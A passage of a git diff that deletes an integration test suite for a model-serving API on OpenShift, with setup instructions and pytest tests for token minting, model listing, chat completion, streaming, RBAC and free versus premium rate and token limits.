venv .venv -. .\.venv\Scripts\Activate -pip install -r requirements.txt -# (optional) pip install pytest-html - -# login (role of your choice) -oc login https://api.:6443 --token '' - -# resolve Route host (avoid $HOST which is reserved in PS) -$CLUSTER_DOMAIN = oc get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}' -$ROUTE_HOST = "maas-api.$CLUSTER_DOMAIN" - -# MaaS API base URL (route-based) -$env:MAAS_API_BASE_URL = "https://$ROUTE_HOST" -$env:USAGE_API_BASE = $env:MAAS_API_BASE_URL - -$env:FREE_OC_TOKEN = oc whoami -t -$env:MODEL_NAME = "" # from /v1/models - -# request-rate bursts -$env:RATE_LIMIT_BURST_FREE = "5" # put your Free limit here -$env:RATE_LIMIT_BURST_PREMIUM = "20" # put your Premium limit here - -# keep token usage low in request-rate tests -$env:TOKENS_PER_CALL_SMALL = "16" -$env:BURST_SLEEP = "0.05" - -# run -pytest -q tests/test_tokens.py::test_minted_token_is_jwt -pytest -q tests/test_models_user.py -pytest -q tests/test_gateway_endpoints.py::test_chat_completion_works -pytest -q tests/test_quota_global.py::test_rate_limit_burst - -# report (timestamped artifacts folder) -$REP_ROOT = "test\maas_billing_tests_independent\artifacts" -$TS = Get-Date -Format "yyyy-MM-dd_HH-mm-ss" -$OUT = "$REP_ROOT\$TS" -New-Item -ItemType Directory -Force -Path $OUT | Out-Null - -pytest -q test/maas_billing_tests_independent/tests ` - --html="$OUT\maas-test-report.html" --self-contained-html ` - --junitxml="$OUT\maas-test-report.xml" - -Write-Host "Reports saved in: $OUT" -``` - -> In PowerShell, **do not** use `$HOST`; use `$ROUTE_HOST`. 
- ---- - -## 7) TL;DR (copy-paste) - -```bash -# venv -python3 -m venv .venv && source .venv/bin/activate && pip install -r requirements.txt - -# login & env -oc login https://api.:6443 --token '' - -CLUSTER_DOMAIN=$(oc get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}') -HOST="maas-api.${CLUSTER_DOMAIN}" -export MAAS_API_BASE_URL="https://${HOST}" - -export USAGE_API_BASE="$MAAS_API_BASE_URL" -export FREE_OC_TOKEN="$(oc whoami -t)" - -# pick a model -curl -s -H "Authorization: Bearer ${FREE_OC_TOKEN}" "${MAAS_API_BASE_URL}/v1/models" | jq -r '.data[] | [.id,.name,.url] | @tsv' -export MODEL_NAME="" - -# bursts from your RLP -export RATE_LIMIT_BURST_FREE=5 -export RATE_LIMIT_BURST_PREMIUM=20 - -# safe defaults for burst tests -export TOKENS_PER_CALL_SMALL=16 -export BURST_SLEEP=0.05 - -# run a few -pytest -q test/maas_billing_tests_independent/tests/test_tokens.py::test_minted_token_is_jwt -pytest -q test/maas_billing_tests_independent/tests/test_models_user.py -pytest -q test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works -pytest -q test/maas_billing_tests_independent/tests/test_quota_global.py::test_rate_limit_burst - -# report (timestamped artifacts folder) -REP_ROOT=test/maas_billing_tests_independent/artifacts -TS=$(date +%Y-%m-%d_%H-%M-%S) -OUT="$REP_ROOT/$TS" -mkdir -p "$OUT" -pytest -q test/maas_billing_tests_independent/tests \ - --html="$OUT/maas-test-report.html" --self-contained-html \ - --junitxml="$OUT/maas-test-report.xml" -``` diff --git a/test/maas_billing_tests_independent/tests/conftest.py b/test/maas_billing_tests_independent/tests/conftest.py deleted file mode 100644 index 04987fabb..000000000 --- a/test/maas_billing_tests_independent/tests/conftest.py +++ /dev/null @@ -1,301 +0,0 @@ -""" -Shared test helpers/fixtures for MaaS billing tests. 
- -What this file provides: -- http(requests.Session) -> respects REQUESTS_VERIFY and INGRESS_CA_PATH (default verify=True) -- base_url -> from $MAAS_API_BASE_URL (skips suite if not set) -- model_name -> from $MODEL_NAME -- bearer(token) -> {"Authorization": f"Bearer "} -- ensure_free_key/ensure_premium_key: - Try to mint a MaaS JWT via /v1/tokens or /tokens (with/without body). - If minting isn't available, fall back to the OC token so tests still run. -- mint_maas_key/revoke_maas_key for explicit control in tests -- parse_usage_headers() -> reads x-odhu-usage-* headers -- get_limit(env_name, fallback_key, default_val): - env override -> cluster CR discovery (RLP/TRLP) -> default -- Simple http_get/http_post wrappers (optional convenience) -""" - -from __future__ import annotations -import os, json, base64, subprocess -import pytest, requests - -# -------------------------- Env & constants -------------------------- - -BASE_URL = os.getenv("MAAS_API_BASE_URL", "").rstrip("/") -MODEL_NAME = os.getenv("MODEL_NAME") -FREE_OC_TOKEN = os.getenv("FREE_OC_TOKEN", "") -PREMIUM_OC_TOKEN = os.getenv("PREMIUM_OC_TOKEN", "") -USAGE_API_BASE = os.getenv("USAGE_API_BASE", BASE_URL) - -# Optional custom CA for HTTPS clusters; not required for HTTP -INGRESS_CA_PATH = os.getenv("INGRESS_CA_PATH", "") - -USAGE_HEADERS = [ - "x-odhu-usage-input-tokens", - "x-odhu-usage-output-tokens", - "x-odhu-usage-total-tokens", -] - -def _env_bool(name: str, default: bool) -> bool: - v = os.getenv(name) - if v is None: - return default - return str(v).strip().lower() not in ("0", "false", "no", "off") - -# -------------------------- Pytest fixtures -------------------------- - -@pytest.fixture(scope="session") -def base_url(): - if not BASE_URL: - pytest.skip("MAAS_API_BASE_URL not set; skipping MaaS billing tests", allow_module_level=True) - return BASE_URL - -@pytest.fixture(scope="session") -def model_name(): - return MODEL_NAME - -@pytest.fixture(scope="session") -def http() -> 
requests.Session: - s = requests.Session() - # Default verify=True; allow opt-out via env; allow custom CA path if provided - verify_default = True - verify_env = _env_bool("REQUESTS_VERIFY", True) - verify: bool | str = verify_env - if INGRESS_CA_PATH and os.path.exists(INGRESS_CA_PATH): - # If a CA bundle is provided, prefer it (typical for OpenShift HTTPS ingress) - verify = INGRESS_CA_PATH - else: - verify = verify_env if verify_env is not None else verify_default - s.verify = verify - return s - -# -------------------------- HTTP helpers ----------------------------- - -def http_get(http: requests.Session, url: str, headers=None, timeout=60): - r = http.get(url, headers=headers or {}, timeout=timeout) - try: - body = r.json() - except Exception: - body = r.text - return r.status_code, body, r - -def http_post(http: requests.Session, url: str, headers=None, json=None, data=None, timeout=60): - r = http.post(url, headers=headers or {}, json=json, data=data, timeout=timeout) - try: - body = r.json() - except Exception: - body = r.text - return r.status_code, body, r - -def bearer(tok: str) -> dict: - return {"Authorization": f"Bearer {tok}"} if tok else {} - -# -------------------------- Token mint/revoke ------------------------ - -def _looks_like_jwt(tok: str) -> bool: - parts = tok.split(".") - if len(parts) != 3: - return False - try: - base64.urlsafe_b64decode(parts[0] + "===") - base64.urlsafe_b64decode(parts[1] + "===") - return True - except Exception: - return False - -def _try_mint_maas_key(http: requests.Session, base_url: str, oc_user_token: str, minutes=10) -> str | None: - """ - Try several permutations commonly seen across clusters: - - POST /v1/tokens and /tokens - - with bodies: {"ttl": "10m"}, {"expiration": "10m"}, {}, and no body - Return the minted token or None if not available. 
- """ - eps = ["/v1/tokens", "/tokens"] - bodies = [{"ttl": f"{minutes}m"}, {"expiration": f"{minutes}m"}, {}, None] - for ep in eps: - url = f"{base_url.rstrip('/')}{ep}" - for body in bodies: - try: - r = http.post(url, headers=bearer(oc_user_token), json=body, timeout=60) - except Exception: - continue - if r.status_code in (200, 201): - try: - j = r.json() - tok = j.get("token") or j.get("access_token") - if tok: - return tok - except Exception: - pass - if r.status_code in (404, 405): - # endpoint not present or method not allowed → try next ep - break - return None - -def mint_maas_key(http: requests.Session, base_url: str, oc_user_token: str, minutes=10) -> str: - tok = _try_mint_maas_key(http, base_url, oc_user_token, minutes=minutes) - if tok: - return tok - raise AssertionError("Could not mint a MaaS key with any common body/endpoint variant") - -def revoke_maas_key(http: requests.Session, base_url: str, oc_user_token: str, token: str | None = None): - # Some clusters revoke by calling DELETE on the token endpoint (token not always needed) - last = None - for ep in ("/v1/tokens", "/tokens"): - url = f"{base_url.rstrip('/')}{ep}" - try: - last = http.delete(url, headers=bearer(oc_user_token), timeout=60) - except Exception: - continue - if last.status_code in (200, 202, 204): - return last - return last - -def ensure_free_key(http: requests.Session) -> str: - """ - Preferred: a minted MaaS JWT. Fallback: the OC token (if cluster accepts Bearer OC). - """ - assert FREE_OC_TOKEN, "FREE_OC_TOKEN not set (export your current user's oc token)" - assert BASE_URL, "MAAS_API_BASE_URL not set" - minted = _try_mint_maas_key(http, BASE_URL, FREE_OC_TOKEN, minutes=10) - if minted and _looks_like_jwt(minted): - return minted - return FREE_OC_TOKEN - -def ensure_premium_key(http: requests.Session) -> str: - """ - Preferred: a minted MaaS JWT. Fallback: the OC token (if cluster accepts Bearer OC). 
- """ - assert PREMIUM_OC_TOKEN, "PREMIUM_OC_TOKEN not set (export your premium user's oc token)" - assert BASE_URL, "MAAS_API_BASE_URL not set" - minted = _try_mint_maas_key(http, BASE_URL, PREMIUM_OC_TOKEN, minutes=10) - if minted and _looks_like_jwt(minted): - return minted - return PREMIUM_OC_TOKEN - -@pytest.fixture -def maas_key(http: requests.Session): - return ensure_free_key(http) - -# -------------------------- Usage headers helper --------------------- - -def parse_usage_headers(resp) -> dict: - out = {} - for h in USAGE_HEADERS: - v = resp.headers.get(h) or resp.headers.get(h.title()) - if v is not None: - try: - out[h] = int(v) - except Exception: - out[h] = v - return out - -# -------------------------- Cluster policy discovery ----------------- - -def _get_json(ns: str, kind: str, name: str): - try: - out = subprocess.run( - ["oc", "-n", ns, "get", kind, name, "-o", "json"], - capture_output=True, text=True, check=True - ).stdout - return json.loads(out) - except Exception: - return {} - -def _first_existing(ns: str, kinds: list[str], name: str): - for k in kinds: - d = _get_json(ns, k, name) - if d: - return d - return {} - -def policy_from_cluster(): - # Try both API groups for each CRD - rlp = _first_existing( - "openshift-ingress", - ["ratelimitpolicies.gateway.networking.k8s.io", - "ratelimitpolicies.kuadrant.io"], - "gateway-rate-limits", - ) - trlp = _first_existing( - "openshift-ingress", - ["tokenratelimitpolicies.gateway.networking.k8s.io", - "tokenratelimitpolicies.kuadrant.io"], - "gateway-default-deny", - ) - return { - "free_burst": (rlp or {}).get("spec", {}).get("limits", {}).get("free", {}).get("rates", [{}])[0].get("limit"), - "premium_burst": (rlp or {}).get("spec", {}).get("limits", {}).get("premium", {}).get("rates", [{}])[0].get("limit"), - "free_tokens": (trlp or {}).get("spec", {}).get("limits", {}).get("free-user-tokens", {}).get("rates", [{}])[0].get("limit"), - "premium_tokens": (trlp or {}).get("spec", {}).get("limits", 
{}).get("premium-user-tokens", {}).get("rates", [{}])[0].get("limit"), - } - -POLICY = policy_from_cluster() - -def get_limit(env_name: str, fallback_key: str, default_val): - """ - Prefer env override → then cluster policy (POLICY[fallback_key]) → default. - Examples: - get_limit("RATE_LIMIT_BURST_FREE", "free_burst", 16) - get_limit("RATE_LIMIT_BURST_PREMIUM", "premium_burst", 32) - get_limit("TOKEN_LIMIT_FREE", "free_tokens", 1000) - get_limit("TOKEN_LIMIT_PREMIUM", "premium_tokens", 2000) - """ - v = os.getenv(env_name) - if v: - try: - return int(v) - except Exception: - return default_val - return POLICY.get(fallback_key) or default_val - -# --- new: tool-calling - - -@pytest.fixture(scope="session") -def tool_calling_enabled() -> bool: - return os.getenv("TOOL_CALLING_ENABLED", "false").lower() in ("1","true","yes") - -# @pytest.fixture(scope="session") -# def tools_spec(): -# return [ -# { -# "type": "function", -# "function": { -# "name": "get_weather", -# "description": "Get current weather for a city/location.", -# "parameters": { -# "type": "object", -# "properties": { -# "city": {"type": "string"}, -# "location": {"type": "string"}, -# "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}, -# }, -# "required": ["location"], -# "additionalProperties": False, -# }, -# }, -# } -# ] - -@pytest.fixture(scope="session") -def tools_spec(): - return [ - { - "type": "function", - "function": { - "name": "get_weather", - "description": "Get current weather for a city/location.", - "parameters": { - "type": "object", - "properties": { - "location": {"type": "string", "description": "City name, e.g. 
Boston, MA"}, - "city": {"type": "string", "description": "City name (legacy alias)"}, - "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]} - }, - "required": ["location"], - "additionalProperties": False - }, - }, - } - ] diff --git a/test/maas_billing_tests_independent/tests/run-billing-tests.sh b/test/maas_billing_tests_independent/tests/run-billing-tests.sh deleted file mode 100644 index 10efaa88a..000000000 --- a/test/maas_billing_tests_independent/tests/run-billing-tests.sh +++ /dev/null @@ -1,42 +0,0 @@ -#!/usr/bin/env bash -set -euo pipefail - -# Where this script lives (…/maas_billing_tests_independent/tests) -SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" - -# Project root for this test suite (…/maas_billing_tests_independent) -SUITE_ROOT="$(cd "${SCRIPT_DIR}/.." && pwd)" - -# Artifacts live inside the test suite folder -ARTIFACTS_DIR="${SUITE_ROOT}/artifacts" - -# Timestamped run folder so each run is isolated -RUN_DIR="${ARTIFACTS_DIR}/$(date +%F_%H-%M-%S)" - -mkdir -p "${RUN_DIR}" - -echo "👉 Writing reports to: ${RUN_DIR}" - -# Optional: honour a venv if you're already inside one -if [[ -z "${VIRTUAL_ENV:-}" ]]; then - echo "ℹ️ No active virtualenv detected. Using system Python." -else - echo "✅ Using virtualenv: ${VIRTUAL_ENV}" -fi - -# You can pass extra pytest args, e.g. -k "smoke" or -x -EXTRA_ARGS=("$@") - -# Run only this suite’s tests -pytest \ - "${SCRIPT_DIR}" \ - --maxfail=0 \ - --html="${RUN_DIR}/maas-test-report.html" --self-contained-html \ - --junitxml="${RUN_DIR}/maas-test-report.xml" \ - -o log_cli=true --log-cli-level=INFO \ - "${EXTRA_ARGS[@]}" - -echo -echo "✅ Done." 
-echo "📄 HTML: ${RUN_DIR}/maas-test-report.html" -echo "🧾 JUnit: ${RUN_DIR}/maas-test-report.xml" diff --git a/test/maas_billing_tests_independent/tests/test_gateway_endpoints.py b/test/maas_billing_tests_independent/tests/test_gateway_endpoints.py deleted file mode 100644 index 87a85cbfc..000000000 --- a/test/maas_billing_tests_independent/tests/test_gateway_endpoints.py +++ /dev/null @@ -1,51 +0,0 @@ -# Test: Chat completion works end-to-end via the Gateway -# 1) GET {base_url}/v1/models with a MaaS token -> expect 200 -# 2) Find the target model and its direct "url" from the payload -# 3) POST {model_url}/v1/chat/completions (NOT under /maas-api) -# -> expect 200/201 and a JSON body with "choices" or "output" - -import os -import time -from conftest import bearer # via_gateway removed - -def test_chat_completion_works(http, base_url, model_name, maas_key): - # 1) Model catalog - models_resp = http.get( - f"{base_url}/v1/models", - headers=bearer(maas_key), - timeout=30, - ) - assert models_resp.status_code == 200, ( - f"models list failed: {models_resp.status_code} {models_resp.text[:200]}" - ) - - body = models_resp.json() - items = body.get("data") or body.get("models") or [] - - # 2) Find our model - target = next( - (m for m in items if m.get("id") == model_name or m.get("name") == model_name), - None, - ) - assert target, f"model {model_name!r} not found in /v1/models payload" - - # Use the catalog's model URL directly (no rewrite) - model_url = target["url"] - - payload = { - "model": model_name, - "messages": [{"role": "user", "content": "hello"}], - "temperature": 0, - } - - # 3) Call chat/completions (allow a single retry if the window is still hot) - r = http.post(f"{model_url}/v1/chat/completions", - headers=bearer(maas_key), json=payload, timeout=60) - if r.status_code == 429: - time.sleep(float(os.getenv("RATE_WINDOW_WAIT", "3"))) - r = http.post(f"{model_url}/v1/chat/completions", - headers=bearer(maas_key), json=payload, timeout=60) - - assert 
r.status_code in (200, 201), f"{r.status_code} {r.text[:200]}" - j = r.json() - assert ("choices" in j and j["choices"]) or ("output" in j), f"unexpected response: {j}" diff --git a/test/maas_billing_tests_independent/tests/test_limits_interplay.py b/test/maas_billing_tests_independent/tests/test_limits_interplay.py deleted file mode 100644 index 1f4a23d52..000000000 --- a/test/maas_billing_tests_independent/tests/test_limits_interplay.py +++ /dev/null @@ -1,74 +0,0 @@ -# Tests rate vs token limits. -# 1) test_request_limit_before_token_limit → many small fast requests → expect 429 (rate limit). -# 2) test_token_limit_before_request_limit → few large token requests → expect 429 (token limit). -# Failures usually mean limits not applied or too high to trigger. - -import os, time, pytest -from conftest import bearer, ensure_free_key, get_limit - -def _url(http, base_url, key, model_name): - r = http.get(f"{base_url}/v1/models", headers=bearer(key), timeout=30) - assert r.status_code == 200 - items = (r.json().get("data") or r.json().get("models") or []) - m = next((m for m in items if m.get("id") == model_name or m.get("name") == model_name), None) - assert m and m.get("url") - return m["url"] - -def _post(http, url, model, key, tokens): - return http.post( - f"{url}/v1/chat/completions", - headers=bearer(key), - json={ - "model": model, - "messages": [{"role": "user", "content": "ping"}], - "max_tokens": tokens, - "temperature": 0, - }, - timeout=60, - ) - -@pytest.mark.skipif(not os.getenv("FREE_OC_TOKEN"), reason="FREE_OC_TOKEN not set") -def test_request_limit_before_token_limit(http, base_url, model_name): - key = ensure_free_key(http) - url = _url(http, base_url, key, model_name) - burst = get_limit("RATE_LIMIT_BURST", "free_burst", 16) - budget = get_limit("TOKEN_LIMIT_FREE", "free_tokens", 1000) - - per_call = int(os.getenv("TOKENS_PER_CALL_SMALL", "8")) # “cheap” - calls = burst + 5 - sleep_s = float(os.getenv("BURST_SLEEP", "0.05")) - codes = [] - for _ in 
range(calls): - r = _post(http, url, model_name, key, per_call) - codes.append(r.status_code) - if r.status_code == 429: - break - time.sleep(sleep_s) - - assert any(c == 429 for c in codes), f"no 429 seen; codes={codes}" - # Optional sanity: cheap calls should not have crossed token budget first - -@pytest.mark.skipif(not os.getenv("FREE_OC_TOKEN"), reason="FREE_OC_TOKEN not set") -def test_token_limit_before_request_limit(http, base_url, model_name): - key = ensure_free_key(http) - url = _url(http, base_url, key, model_name) - burst = get_limit("RATE_LIMIT_BURST", "free_burst", 16) - budget = get_limit("TOKEN_LIMIT_FREE", "free_tokens", 1000) - - calls = min(burst - 1, 5) if burst > 1 else 1 # stay under burst - per_call = max(64, (budget // max(calls, 1)) + 64) # “expensive” - sleep_s = float(os.getenv("BURST_SLEEP", "0.05")) - codes = [] - for _ in range(calls): - r = _post(http, url, model_name, key, per_call) - codes.append(r.status_code) - if r.status_code == 429: - break - time.sleep(sleep_s) - - # If budget wasn’t yet crossed, send one more to push it over - if 429 not in codes: - r = _post(http, url, model_name, key, per_call) - codes.append(r.status_code) - - assert any(c == 429 for c in codes), f"no 429 seen; codes={codes}" diff --git a/test/maas_billing_tests_independent/tests/test_maas_api_mint_and_models.py b/test/maas_billing_tests_independent/tests/test_maas_api_mint_and_models.py deleted file mode 100644 index 336244738..000000000 --- a/test/maas_billing_tests_independent/tests/test_maas_api_mint_and_models.py +++ /dev/null @@ -1,19 +0,0 @@ -# Verifies basic MaaS API health: -# 1) test_mint_token → we can mint an auth token (looks like a long JWT). -# 2) test_list_models_exposes_urls → /v1/models returns a list and each model -# entry includes a usable endpoint/URL (or at least id/endpoint fields). -# If these fail, the control-plane (token mint) or catalog (models/URLs) is broken. 
- -from conftest import bearer - -def test_mint_token(maas_key): - assert isinstance(maas_key, str) and len(maas_key) > 100 - -def test_list_models_exposes_urls(http, base_url, maas_key): - r = http.get(f"{base_url}/v1/models", headers=bearer(maas_key)) - assert r.status_code == 200, r.text[:200] - j = r.json() - data = j.get("data") or j.get("models") or [] - assert isinstance(data, list) and data - item = data[0] if data else {} - assert isinstance(item, dict) and any(k in item for k in ("url", "endpoint", "id")) diff --git a/test/maas_billing_tests_independent/tests/test_models_user.py b/test/maas_billing_tests_independent/tests/test_models_user.py deleted file mode 100644 index 38b26b20a..000000000 --- a/test/maas_billing_tests_independent/tests/test_models_user.py +++ /dev/null @@ -1,11 +0,0 @@ -# Smoke-check: catalog endpoint is reachable and shaped correctly. -# - Calls /v1/models with a valid token. -# - Expects HTTP 200 and a JSON body that has either "data" or "models". -# If this fails, the MaaS API or its model catalog is unavailable/misconfigured. 
- -from conftest import bearer - -def test_models_user(http, base_url, maas_key): - r = http.get(f"{base_url}/v1/models", headers=bearer(maas_key)) - assert r.status_code == 200, r.text[:200] - assert "data" in r.json() or "models" in r.json() diff --git a/test/maas_billing_tests_independent/tests/test_quota_global.py b/test/maas_billing_tests_independent/tests/test_quota_global.py deleted file mode 100644 index 0a1a67ff9..000000000 --- a/test/maas_billing_tests_independent/tests/test_quota_global.py +++ /dev/null @@ -1,49 +0,0 @@ -# Validates Free-tier request *rate* limiting works: -# - Sends N quick /v1/chat/completions -# - Expects at least one 429 -# - If burst is known, expects >= burst successes before 429s - -import os, time -from conftest import bearer, ensure_free_key, get_limit - -def test_rate_limit_burst(http, base_url, model_name): - key = ensure_free_key(http) - - # Discover configured burst if available - burst = get_limit("RATE_LIMIT_BURST_FREE", "free_burst", None) - - # Discover the model URL once - models = http.get(f"{base_url}/v1/models", headers=bearer(key), timeout=30) - assert models.status_code == 200, f"/v1/models failed: {models.status_code} {models.text[:200]}" - body = models.json() - items = body.get("data") or body.get("models") or [] - target = next((m for m in items if m.get("id") == model_name or m.get("name") == model_name), None) - assert target and target.get("url"), f"model {model_name!r} not found or missing url" - - # Use the catalog's model URL directly - model_url = target["url"] - - # Choose N: just above burst if known, else a safe default - N = (burst + 5) if burst is not None else int(os.getenv("GLOBAL_BURST_N", "25")) - - per_call_tokens = int(os.getenv("TOKENS_PER_CALL_SMALL", "16")) - sleep_s = float(os.getenv("BURST_SLEEP", "0.05")) - - codes = [] - for _ in range(N): - r = http.post( - f"{model_url}/v1/chat/completions", - headers=bearer(key), - json={"model": model_name, "messages": [{"role": "user", "content": 
"hi"}], - "max_tokens": per_call_tokens, "temperature": 0}, - timeout=60, - ) - codes.append(r.status_code) - time.sleep(sleep_s) - - ok = sum(c in (200, 201) for c in codes) - rl = sum(c == 429 for c in codes) - - assert rl >= 1, f"expected at least one 429 after burst; codes={codes}" - if burst is not None: - assert ok >= burst, f"expected >= {burst} successes before limiting; got {ok}, codes={codes}" diff --git a/test/maas_billing_tests_independent/tests/test_quota_per_user.py b/test/maas_billing_tests_independent/tests/test_quota_per_user.py deleted file mode 100644 index c2763e201..000000000 --- a/test/maas_billing_tests_independent/tests/test_quota_per_user.py +++ /dev/null @@ -1,81 +0,0 @@ -""" -Purpose: Compare Free vs Premium *request-rate* behavior for the same model. -Result: Premium should be >= Free (not more restricted). - -We do not require any env tuning: -- We'll try to discover bursts from the cluster. If unavailable, we simply pick N large - enough by default so both tiers should hit the limiter at least once. - -Example: -- Free burst = 8, Premium burst = 16 -- N = burst(max) + 5 requests per user - Free: first 8 → 200, later → 429 => free_ok = 8 - Premium: first 16 → 200, later → 429 => prem_ok = 16 -- Assertion: prem_ok >= free_ok (Premium is not worse than Free) - -If both tiers allow ≥ N, you'll see free_ok = prem_ok = N → PASS (still correct). -If Premium were lower than Free, prem_ok < free_ok → FAIL. 
-""" - -import os, pytest, time -from conftest import bearer, ensure_free_key, ensure_premium_key, get_limit - -@pytest.mark.skipif(not os.getenv("PREMIUM_OC_TOKEN"), reason="PREMIUM_OC_TOKEN not set") -def test_free_vs_premium_quota(http, base_url, model_name): - free_key = ensure_free_key(http) - prem_key = ensure_premium_key(http) - - # Discover the model URL once (either key works) - models = http.get(f"{base_url}/v1/models", headers=bearer(free_key), timeout=30).json() - items = models.get("data") or models.get("models") or [] - target = next((m for m in items if m.get("id") == model_name or m.get("name") == model_name), None) - assert target and target.get("url"), f"model {model_name!r} not found or missing 'url'" - model_url = target["url"] - - # Bursts (env -> RLP -> None) - free_burst = get_limit("RATE_LIMIT_BURST_FREE", "free_burst", None) - prem_burst = get_limit("RATE_LIMIT_BURST_PREMIUM", "premium_burst", None) - - # Pick N slightly above the larger known burst; if unknown, default to 25 - if free_burst is not None or prem_burst is not None: - N_default = max(free_burst or 0, prem_burst or 0) + 5 - else: - N_default = 25 - N = int(os.getenv("N_BURST", str(N_default))) - - # Keep calls "cheap" so token-rate limiter does not trip here - per_call_tokens = int(os.getenv("TOKENS_PER_CALL_SMALL", "16")) - sleep_s = float(os.getenv("BURST_SLEEP", "0.05")) - - def run(key): - ok = 0 - rl = 0 - for _ in range(N): - r = http.post( - f"{model_url}/v1/chat/completions", - headers=bearer(key), - json={ - "model": model_name, - "messages": [{"role": "user", "content": "hi"}], - "max_tokens": per_call_tokens, - "temperature": 0, - }, - timeout=60, - ) - if r.status_code in (200, 201): - ok += 1 - elif r.status_code == 429: - rl += 1 - time.sleep(sleep_s) - return ok, rl - - free_ok, free_rl = run(free_key) - prem_ok, prem_rl = run(prem_key) - - # Both tiers should hit limiter at least once if N is large enough - assert free_rl >= 1 or prem_rl >= 1, ( - f"no 429 seen; 
increase N_BURST (now {N}) or check rate-limits. " - f"free_ok={free_ok}, free_rl={free_rl}, prem_ok={prem_ok}, prem_rl={prem_rl}" - ) - # Core expectation: premium is not worse than free - assert prem_ok >= free_ok, f"premium_ok={prem_ok} < free_ok={free_ok}" diff --git a/test/maas_billing_tests_independent/tests/test_rbac.py b/test/maas_billing_tests_independent/tests/test_rbac.py deleted file mode 100644 index c8614cd58..000000000 --- a/test/maas_billing_tests_independent/tests/test_rbac.py +++ /dev/null @@ -1,6 +0,0 @@ -from conftest import bearer - -def test_user_cannot_list_admin_keys(http, base_url, maas_key): - r = http.get(f"{base_url}/v1/keys", headers=bearer(maas_key)) - if r.status_code != 404: - assert r.status_code in (401, 403) diff --git a/test/maas_billing_tests_independent/tests/test_streaming_chat.py b/test/maas_billing_tests_independent/tests/test_streaming_chat.py deleted file mode 100644 index 334608452..000000000 --- a/test/maas_billing_tests_independent/tests/test_streaming_chat.py +++ /dev/null @@ -1,103 +0,0 @@ -import os, json, shlex, subprocess, pytest - -# Enable extra logs in report/console when STREAMING_DEBUG=1|true|yes -DEBUG = os.getenv("STREAMING_DEBUG", "false").lower() in ("1", "true", "yes") - -@pytest.mark.skipif( - os.getenv("STREAMING_ENABLED", "false").lower() not in ("1", "true", "yes"), - reason="Streaming test not enabled for this environment", -) -def test_chat_completions_streaming(http, base_url, model_name): - # 1) Mint MaaS token - oc_token = subprocess.check_output(shlex.split("oc whoami -t"), text=True).strip() - r = http.post( - f"{base_url}/v1/tokens", - headers={"Authorization": f"Bearer {oc_token}", "Content-Type": "application/json"}, - json={"expiration": "20m"}, - timeout=30, - ) - assert r.status_code in (200, 201), "Token mint failed" - token = r.json()["token"] - - # 2) Discover model URL ← make sure everything below is indented inside the function - r = http.get(f"{base_url}/v1/models", 
headers={"Authorization": f"Bearer {token}"}, timeout=30) - assert r.status_code == 200, "Models list failed" - models = r.json()["data"] - model_entry = next((m for m in models if m["id"] == model_name), None) - assert model_entry, f"Model {model_name} not found in /v1/models" - - chat_url = (model_entry.get("url") or "").rstrip("/") - assert chat_url, "Model entry has no 'url'" - if not chat_url.endswith("/v1/chat/completions"): - chat_url = f"{chat_url}/v1/chat/completions" - if DEBUG: - print(f"[streaming] chat_url={chat_url}") - - # 3) Streaming request payload - payload = { - "model": model_name, - "messages": [ - {"role": "system", "content": "You are concise."}, - {"role": "user", "content": "Say one short sentence about Texas Weather (just a sentence)."}, - ], - "stream": True, - "max_tokens": 20, - "temperature": 0, - } - - r = http.post( - chat_url, - headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"}, - json=payload, - timeout=90, - stream=True, - ) - # 4) Validate SSE and reconstruct text - assert r.status_code == 200, "Streaming call failed" - ctype = (r.headers.get("content-type") or r.headers.get("Content-Type") or "").lower() - assert "text/event-stream" in ctype, f"Unexpected Content-Type: {ctype}" - if DEBUG: - print(f"[streaming] content-type={ctype}") - - saw_done = False - saw_json = False - chunks: list[str] = [] - - for raw in r.iter_lines(decode_unicode=True): - if not raw: - continue - if DEBUG: - print(f"[sse] {raw}") - if not raw.startswith("data:"): - continue - - data = raw[5:].strip() - if data == "[DONE]": - saw_done = True - break - - try: - j = json.loads(data) - saw_json = True - ch = (j.get("choices") or [{}])[0] - # OpenAI-style SSE frames: choices[].delta.{content|role} - delta = ch.get("delta") or (ch.get("message") if "message" in ch else {}) or {} - piece = delta.get("content") or "" - if isinstance(piece, str) and piece: - chunks.append(piece) - if DEBUG: - print(f"[chunk {len(chunks):02d}] 
{piece!r}") - except Exception as e: - if DEBUG: - print(f"[sse] JSON parse error: {e}") - - text = "".join(chunks).strip() - if DEBUG: - print("\n[streaming] ✅ Stream completed" if saw_done else "\n[streaming] ⚠️ No [DONE] seen") - print(f"[streaming] ✅ Received {len(chunks)} chunks") - print(f"[streaming] ✅ Final text: {text!r}\n") - - assert saw_json, "No JSON streaming frames received." - assert saw_done, "Missing SSE terminator [DONE]." - assert text, "Reconstructed streamed content is empty." - assert len(text) >= 5, f"Streamed content too short: '{text}'" diff --git a/test/maas_billing_tests_independent/tests/test_token_ratelimit.py b/test/maas_billing_tests_independent/tests/test_token_ratelimit.py deleted file mode 100644 index cbc8466e0..000000000 --- a/test/maas_billing_tests_independent/tests/test_token_ratelimit.py +++ /dev/null @@ -1,94 +0,0 @@ -# Verifies the *token* budget limiter for the Free tier. -# Flow: -# 1) Discover model URL from /v1/models. -# 2) Send a few “expensive” chat/completions calls (large max_tokens) so we -# stay under the request-rate burst but exceed the Free token budget. -# 3) Expect to see a 429 once the cumulative tokens cross the budget. -# Notes: -# - Reads token budget/burst from cluster (with env overrides). -# - If usage headers aren’t exposed, the test skips (can’t measure tokens). 
